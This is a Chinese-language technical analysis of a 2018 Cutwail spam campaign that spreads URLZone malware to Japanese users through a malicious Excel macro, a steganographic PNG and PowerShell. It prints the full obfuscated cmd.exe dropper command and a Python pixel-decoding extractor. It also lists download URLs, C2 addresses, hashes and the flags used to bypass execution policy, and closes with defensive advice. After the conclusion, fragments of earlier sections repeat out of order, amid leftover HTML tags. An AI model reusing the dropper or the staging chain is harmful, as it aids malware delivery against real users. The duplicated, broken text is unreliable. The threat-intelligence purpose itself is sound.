Cutwail垃圾邮件活动利用隐写术传播URLZone恶意软件技术分析<\/h1>

一、活动概述<\/h2>
2018年10月24日，CrowdStrike研究人员发现一起由NARWHAL SPIDER组织发起的垃圾邮件活动(Cutwail)。该活动针对日语用户，采用多阶段攻击链，最终传播URLZone恶意软件。<\/p>

二、攻击流程分析<\/h2>

1. 初始感染载体<\/h3>

邮件特征<\/strong>：<\/p>

包含恶意Excel附件，文件名格式：DOC2410201810{DIGIT[6]}.xls<\/code><\/li>
样本SHA256：54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2e<\/code><\/li>
邮件正文通常为空或包含特定内容<\/li> <\/ul> <\/li>
恶意Excel文件<\/strong>：<\/p> 需要用户启用宏才能触发恶意代码<\/li> 使用VBA宏代码作为第一阶段攻击载荷<\/li> <\/ul> <\/li> <\/ul> 2. 攻击阶段分析<\/h3> Stage 1: 反混淆阶段<\/h4> 执行方式<\/strong>：<\/p> 通过VBA宏启动cmd.exe<\/code><\/li> 使用复杂的命令混淆技术<\/li> <\/ul> <\/li> 关键命令<\/strong>：<\/p> cmd.exe \/V:ON\/C"set lW=o.crm`VPx57^^l(SEX]L8{-Y=GZU:K<\/span>%0B[9ia2eb*yftp_\/T$j1'vdMF^|C\Hwk^&)WAIDn+}h4,sg6;3 R""ON&&for <\/span>%9 in (15,2,70,82,45,78,78,47,71,24,10,23,32,42,22,7,15,17,13,50,53,50,68,50,64,46,70,50,62,78,76,78,78,78,47,71,19,16,10,23,78,32,42,40,43,37,17,13,50,14,40,73,42,15,4,1,46,50,68,50,15,8,50,68,50,46,50,68,50,1,15,83,2,50,68,50,0,50,68,50,66,65,67,74,50,62,76,78,78,1,13,81,20,49,69,20,30,69,81,78,21,41,50,12,50,72,50,73,35,50,62,78,13,50,35,50,62,78,13,81,20,30,69,20,36,69,20,49,69,81,78,21,41,50,83,37,59,50,72,50,2,42,50,72,50,21,82,38,48,37,50,62,76,11,11,11,61,13,81,20,30,69,20,49,69,81,21,41,78,50,64,52,52,21,46,50,72,50,40,43,37,50,62,78,21,64,73,73,37,4,38,12,40,83,35,4,37,78,81,14,40,73,42,37,4,1,66,3,35,59,34,67,74,81,76,47,20,74,69,23,11,11,11,61,13,50,35,50,62,78,13,81,20,71,69,20,36,69,20,49,69,20,30,69,20,77,69,81,21,41,78,50,1,31,34,50,72,50,34,67,74,50,72,50,59,50,72,50,42,4,35,43,50,72,50,14,40,73,42,37,4,1,66,3,35,50,62,13,13,11,11,11,61,13,50,35,50,62,78,13,81,20,30,69,20,49,69,20,77,69,20,36,69,81,78,21,41,78,50,83,37,42,1,50,72,50,63,37,50,72,50,42,50,72,50,38,56,12,34,37,67,50,62,62,1,13,81,20,49,69,20,30,69,81,78,21,41,50,43,37,67,79,37,35,52,50,72,50,82,50,62,1,65,67,51,0,60,37,13,81,70,42,42,43,73,27,45,45,34,4,35,74,37,73,36,1,34,4,74,38,0,8,1,2,0,4,45,2,35,45,19,19,45,64,36,25,14,12,63,75,14,44,0,1,43,67,74,81,62,62,76,47,20,82,69,23,11,11,11,61,13,50,35,50,62,78,13,81,20,30,69,20,49,69,81,21,41,50,31,40,42,37,50,72,50,32,17,50,62,78,49,19,75,30,76,13,30,1,1,36,62,11,11,11,55,1,13,50,29,50,62,20,41,0,3,37,35,2,70,13,47,20,8,69,78,34,67,13,30,1,1,75,49,33,62,62,20,47,20,43,69,23,47,20,74,69,1,13,81,20,30,69,20,49,69,81,78,21,41,78,50,24,37,42,7,34,50,72,50,8,37,12,50,62,1,65,67,51,0,60,37,13,47,20,8,69,72,47,20,44,69,62,76,47,20,0,69,32,47,20,44,69,39,75,36,30,68,47,20,16,69,17,23,13,78,78,47,71,74,10,27,27,13,81,20,49,69,20,30,69,81,21,41,78,50,12,0,0,3,50,72,50,54,50,62,1,65,67,51,0,60,37,13,13,47,20,43,69,1,81,31,81,21,38,35,67,52,49,9,62,39,49,75,62,21,38,0,3,13,47,20,43,69,1,81,74,81,78,21,38,35,67,52,78,49,9,62,62,69,69,76,11,11,11,61,13,81,20,30,69,20,49,69,81,78,21,41,50,65,50,72,50,15,16,50,62,13,78,13,78,18,14,78,78,51,64,79,65,35,38,18,15,27,71,19,8,10,78,62,1,6,35,12,26,15,27,27,81,35,5,73,2,34,34,81,1,81,74,37,42,5,73,5,46,3,65,67,24,81,13,47,20,82,69,32,30,1,1,49,77,71,49,17,62,62,78,55,2,27,57,59,65,67,52,82,59,73,57,14,40,14,42,37,4,77,36,57,56,12,34,7,1,15,8,15,78,61,61,56,53,52,1,15,8,37,78,78,78,45,2,78,43,0,59,37,3,14,58,15,18,18,78,21,15,8,37,56,26,46,65,82,83,43,82,12,78,31,22,7,35,73,73,78,78,21,83,0,67,34,83,78,21,59,65,67,52,82,59,14,46,22,78,58,65,66,66,15,67,78,21,67,82,43,79,82,54,34,78,78,21,73,42,78,78,21,83,0,12,82,74,82,78,78,78,78,78,1,78,13,78,78,57,81,20,30,69,20,49,69,20,36,69,57,81,78,21,41,78,50,64,52,52,50,72,13,78,57,81,20,30,69,20,49,69,57,81,78,21,41,50,21,50,72,50,46,40,43,50,78,62,72,50,37,50,78,78,62,78,21,64,73,73,37,4,78,13,57,81,20,77,69,20,49,69,20,9,69,20,30,69,20,71,69,20,36,69,57,81,78,21,41,78,13,78,78,57,81,20,36,69,20,49,69,20,30,69,57,81,78,21,41,50,52,50,72,50,1,63,34,67,50,72,50,37,4,50,78,78,62,72,50,40,73,50,72,50,73,50,72,50,14,50,72,13,78,57,81,20,36,69,20,49,69,20,30,69,57,81,21,41,78,50,54,0,3,4,50,72,50,1,50,72,50,0,59,73,50,62,72,50,42,50,62,78,78,78,76,78,78,78,11,11,11,61,78,78,13,78,78,78,47,20,37,5,83,6,5,27,2,82,53,73,5,43,37,2,69,32,71,72,49,9,72,36,9,17,21,48,82,65,83,50,50,62,78,13,78,78,13,78,32,14,22,14,42,37,53,1,63,34,83,66,0,63,73,1,54,0,3,53,14,1,56,18,65,7,38,82,35,79,52,17,27,27,13,57,81,20,30,69,20,49,69,57,81,78,21,41,78,50,24,50,72,13,57,81,20,30,69,20,49,69,57,81,78,21,41,50,37,50,72,50,42,42,15,8,46,50,78,62,62,1,57,81,34,5,83,51,5,0,28,15,57,81,13,78,78,62,78,78,62,78,78,62,78,76,78,78,32,14,40,73,42,37,4,1,63,34,67,52,0,59,73,1,54,0,3,4,73,1,56,12,34,43,38,0,35,3,52,17,27,27,13,57,81,20,30,69,20,49,69,57,81,78,21,41,50,56,12,50,72,50,37,35,3,50,78,62,1,57,81,34,5,83,51,82,5,60,15,57,81,13,78,62,84)do set Rc=!Rc!!lW:~<\/span>%9,1!&&if <\/span>%9 geq 84 cmd \/C!Rc:~-1334!"<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> Stage 2: PowerShell下载与隐写术解码<\/h4> 主要功能<\/strong>：<\/p> 下载含有隐写术的PNG图片<\/li> 从图片中解码出PowerShell命令<\/li> <\/ul> <\/li> 关键特征<\/strong>：<\/p> 图片下载URL：https:\/\/images2.imgbox.com\/ca\/88\/A2ZSlW6S_o.png<\/code><\/li> 图片SHA256：73da11127aa1da5538d153ba7f063c74fb90af46da581f098f179e1bb8371904<\/code><\/li> 使用蓝绿信道的4个最重要位隐藏数据<\/li> <\/ul> <\/li> 隐写术提取代码(Python)<\/strong>：<\/p> from<\/span> PIL import<\/span> Image <\/span><\/span>import<\/span> sys <\/span><\/span> <\/span><\/span>image =<\/span> Image.<\/span>open(sys.<\/span>argv[1<\/span>]) <\/span><\/span>pixel =<\/span> image.<\/span>load() <\/span><\/span>payload =<\/span> bytearray() <\/span><\/span> <\/span><\/span>for<\/span> y in<\/span> xrange(3<\/span>): <\/span><\/span> for<\/span> x in<\/span> range(620<\/span>): <\/span><\/span> r, g, b =<\/span> pixel[x, y] <\/span><\/span> payload.<\/span>append((b &<\/span> 15<\/span>) *<\/span> 16<\/span> |<\/span> (g &<\/span> 15<\/span>)) <\/span><\/span> <\/span><\/span>print(payload) <\/span><\/span><\/code><\/pre><\/li> PowerShell执行方式<\/strong>：<\/p> 使用-ExecutionPolicy Bypass<\/code>绕过执行策略<\/li> 使用-WindowStyle Hidden<\/code>隐藏窗口<\/li> 使用剪贴板作为命令传输媒介<\/li> <\/ul> <\/li> <\/ul> Stage 3: 最终Payload投放<\/h4> 主要功能<\/strong>：<\/p> 检查系统区域设置是否为日本(ja)<\/li> 从指定URL下载最终payload<\/li> <\/ul> <\/li> 关键特征<\/strong>：<\/p> 下载URL：http[:]\/\/pigertime[.]com\/mksettting<\/code><\/li> 保存路径：%TEMP%\pain.exe<\/code><\/li> User-Agent：Mozilla\/5.0 (Windows NT; Windows NT 10.0; us-US) AppleWebKit\/534.6 (KHTML, like Gecko) Chrome\/7.0.500.0 Safari\/534.6<\/code><\/li> <\/ul> <\/li> 最终Payload<\/strong>：<\/p> SHA256：03fe36e396a2730fa9a51c455d39f2ba8168e5e7b1111102c1e349b6eac93778<\/code><\/li> 类型：URLZone恶意软件变种<\/li> <\/ul> <\/li> <\/ul> 三、URLZone恶意软件分析<\/h2> 1. C2通信<\/h3> C2服务器：https:\/\/oaril[.]com\/auth\/<\/code><\/li> 使用的公钥： -----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCmk6zOuYcUd1H6vUyvuxrcozqW mOl5jTa9HDodiKaPtRPmNv2rRPF\/4urX476F+SM6kmLcG04lnE3bEAQzO+kJJx8x gmxESN8piJ3aSxnjAqpt3rVjmwXmoULE1wnOFCKt32UmfZ7xNaPeYJyLvgcfGMme MGuPDjhqw5LmxzzSjwIDAQAB -----END PUBLIC KEY----- <\/code><\/pre> <\/li> <\/ul> 2. 后续活动<\/h3> 成功安装URLZone后，C2服务器会发送请求下载并执行其他恶意payload。在之前的活动中，下载的是Gozi ISFB恶意软件。<\/p> 四、技术亮点与防御建议<\/h2> 1. 技术亮点<\/h3> 多阶段攻击链<\/strong>：使用VBA→批处理→PowerShell的多阶段执行方式<\/li> 隐写术应用<\/strong>：利用PNG图片的蓝绿信道隐藏PowerShell命令<\/li> 剪贴板利用<\/strong>：使用剪贴板作为命令传输媒介<\/li> 区域锁定<\/strong>：仅针对日语系统用户进行攻击<\/li> <\/ul> 2. 防御建议<\/h3> 邮件安全<\/strong>：<\/p> 禁用Office宏执行或限制宏使用<\/li> 对可疑邮件附件进行沙箱分析<\/li> <\/ul> <\/li> 终端防护<\/strong>：<\/p> 监控PowerShell的异常使用模式<\/li> 阻止可疑的进程链（如Excel→cmd→PowerShell）<\/li> <\/ul> <\/li> 网络防护<\/strong>：<\/p> 拦截已知恶意域名（如pigertime[.]com, oaril[.]com）<\/li> 监控异常图片下载行为<\/li> <\/ul> <\/li> 隐写术检测<\/strong>：<\/p> 实现图片隐写术检测机制<\/li> 对从图片中提取的数据进行安全分析<\/li> <\/ul> <\/li> <\/ul> 五、总结<\/h2> Cutwail垃圾邮件活动展示了NARWHAL SPIDER组织采用的新技术趋势，特别是隐写术的应用。这种技术可以有效绕过传统安全检测，增加感染成功率。安全团队应关注此类技术的演变，并更新防御策略以应对这些高级威胁。<\/p>

Cutwail垃圾邮件活动利用隐写术传播URLZone恶意软件技术分析<\/h1>

一、活动概述<\/h2> 2018年10月24日，CrowdStrike研究人员发现一起由NARWHAL SPIDER组织发起的垃圾邮件活动(Cutwail)。该活动针对日语用户，采用多阶段攻击链，最终传播URLZone恶意软件。<\/p>

二、攻击流程分析<\/h2>

2. 攻击阶段分析<\/h3>

三、URLZone恶意软件分析<\/h2>

2. 后续活动<\/h3> 成功安装URLZone后，C2服务器会发送请求下载并执行其他恶意payload。在之前的活动中，下载的是Gozi ISFB恶意软件。<\/p>

四、技术亮点与防御建议<\/h2>

一、活动概述<\/h2>
2018年10月24日，CrowdStrike研究人员发现一起由NARWHAL SPIDER组织发起的垃圾邮件活动(Cutwail)。该活动针对日语用户，采用多阶段攻击链，最终传播URLZone恶意软件。<\/p>

2. 后续活动<\/h3>
成功安装URLZone后，C2服务器会发送请求下载并执行其他恶意payload。在之前的活动中，下载的是Gozi ISFB恶意软件。<\/p>